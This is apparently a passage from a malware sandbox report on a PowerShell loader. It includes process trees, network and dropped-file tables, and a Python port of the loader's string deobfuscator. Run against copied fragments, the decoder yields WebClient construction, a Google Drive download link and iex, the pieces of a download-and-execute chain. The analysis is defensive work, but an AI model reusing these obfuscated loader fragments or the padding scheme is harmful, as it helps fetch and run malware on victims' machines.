gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
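The PowerShell command lines in both process trees above (behavioral2 on win10 and behavioral1 on win7) are identical and use one string encoder: every literal goes through Afglatningen, which keeps only the characters at odd offsets and treats the rest as padding, and Loafers is iex. The Python below is an added example, not part of this report or of the sample, that ports that decoder, runs it over a constructed fragment of the command line (six literals copied from above), and reproduces the second-stage carve statically (Get-Content of the dropped file, FromBase64String, ASCII, Substring at offset 370814 for 26725 characters, iex) on a constructed blob so that nothing is executed. The single assumption is a restored run of two spaces in the User-Agent literal, noted in the code.

```python
import base64
import re

# Offsets the loader hands to .Substring() on the ASCII text of the
# base64-decoded drop (%appdata%\Vigesimation.Sor); both values are literal
# in the command line: $Forsyndelsers=370814 and $Tagetone211=26725.
STAGE2_OFFSET = 370814
STAGE2_LENGTH = 26725


def deobfuscate(padded: str) -> str:
    """Port of the loader's Afglatningen function.

    The PowerShell loop is: for ($i = 1; $i -lt Length-1; $i += 2) take
    Substring($i, 1).  Only odd offsets are kept, every even offset is junk
    padding, and the bound is exclusive, so the last character of a literal
    is never read.
    """
    limit = len(padded) - 1
    return "".join(padded[i] for i in range(1, limit, 2))


# Every encoded literal in the command line has the shape  Afglatningen '<padded>'
_LITERAL = re.compile(r"Afglatningen\s+'([^']*)'")


def decode_literals(cmdline: str) -> list:
    """Decode every Afglatningen literal found in a command line, in order."""
    return [deobfuscate(m.group(1)) for m in _LITERAL.finditer(cmdline)]


def carve_stage2(blob: bytes, offset: int = STAGE2_OFFSET, length: int = STAGE2_LENGTH) -> str:
    """Reproduce the second stage statically, without running anything.

    The loader does: Get-Content <drop> -> [Convert]::FromBase64String ->
    [Text.Encoding]::ASCII.GetString -> .Substring(offset, length) -> iex.
    The drop is base64 around a large text blob of which only one window is
    the real script; this returns that window.
    """
    text = base64.b64decode(blob).decode("ascii", errors="replace")
    if offset + length > len(text):
        raise ValueError("carve window lies outside the decoded payload")
    return text[offset:offset + length]


# Constructed fragment: six literals copied from the command line above.  In
# the User-Agent literal one run of two spaces ("sK  NcT") is restored here
# (assumption): the rendered report collapses it to a single space, which
# flips the parity of every later character and derails the decode right
# after "Windows".
SAMPLE_CMDLINE = (
    "$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK  NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';"
    "$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';"
    "$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';"
    "$Verfende=Afglatningen ',i.e.xC ';"
    "$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \\,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';"
    "$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');"
)


def demo_drop() -> bytes:
    """Constructed stand-in for the dropped file: base64 of junk + script + junk."""
    return base64.b64encode(b"x" * 10 + b"Write-Host 'stage2'" + b"y" * 5)


if __name__ == "__main__":
    for value in decode_literals(SAMPLE_CMDLINE):
        print(repr(value))
    # A real drop would use the default offsets; the demo blob is tiny.
    print(carve_stage2(demo_drop(), offset=10, length=19))
```

Decoding shows why the loader spawns cmd.exe: `echo %appdata%\Vigesimation.Sor && echo t` resolves the drop path and also supplies the trailing `t` that completes `System.Net.WebClient`, because the decoder never reads a literal's last character and the literal itself only yields `WebClien`. The download URL decodes to a drive.google.com `uc?export=download` link, which is consistent with the Network tables. If a decoded string derails part-way through, suspect whitespace collapsed by the report renderer and re-extract the command line from the raw process data before trusting any indicator taken from it.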
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
Files
memory/2640-4-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp
memory/2640-5-0x000000001B570000-0x000000001B852000-memory.dmp
memory/2640-7-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-6-0x0000000002800000-0x0000000002808000-memory.dmp
memory/2640-8-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-9-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-10-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2640-11-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11PMM5DR0IT9S7NTEZNV.temp
| MD5 | ca0cb62acb863e6a43bb5e7e904723d6 |
| SHA1 | c7a33fd935a74bf51c50d63f313c286943fcad7e |
| SHA256 | c9bf41ee6976cada8f38656686108183962a89341875323cb954e12c08ab15e5 |
| SHA512 | d90c8897e22bbada46e2e276a458c7683a2c886b9277cc21084e1e7eca6a7a483e5dd866a097d2f2908badc18807b98d8d57c2b43c1e019f2b8da55416f91648 |
C:\Users\Admin\AppData\Roaming\Vigesimation.Sor
| MD5 | 3d5345e787f5607ceeab0031c358f539 |
| SHA1 | 19dc82bb214aa4cedc883e99d3d29b196d83a330 |
| SHA256 | dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2 |
| SHA512 | 8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f |
memory/2640-31-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2200-32-0x00000000065D0000-0x000000000972C000-memory.dmp
memory/2640-33-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6aef994d68f80872bbf1cb884113b678 |
| SHA1 | de09b9436dc85dcb209eb0e984ef5f7b10f4a262 |
| SHA256 | 3f8012ec29eccbb3e4685be408337b2e5cf35ccc5c73cbbfe6c895c15f87ab7c |
| SHA512 | ed86a16edb52333378e8371b5e50344d245eff170049bf79dfad62482b23cd450f3e657ba8c7b749f5f04a12681cf5d1cd0df98553f079703528b89f0b1dc16a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | f23167d80233f717903aa79369a7f3a4 |
| SHA1 | 5cccfb014056de3c0a8810c706d637953ff17782 |
| SHA256 | 300042cba8afd16029d8afeb196d6940e2df4f2e5feb1ced58a63f8f9dfe4e28 |
| SHA512 | 777e54e3b1ae324c5e2b9544314a96bf2a13cfed6e78d9e5de4cffac5c87290613502967eb5f5f763c289a2ceb0169e898504c0513f52c701dbff79d1e57f346 |
memory/2716-60-0x0000000000B50000-0x0000000001BB2000-memory.dmp
memory/2640-61-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/2716-62-0x0000000000B50000-0x0000000000B92000-memory.dmp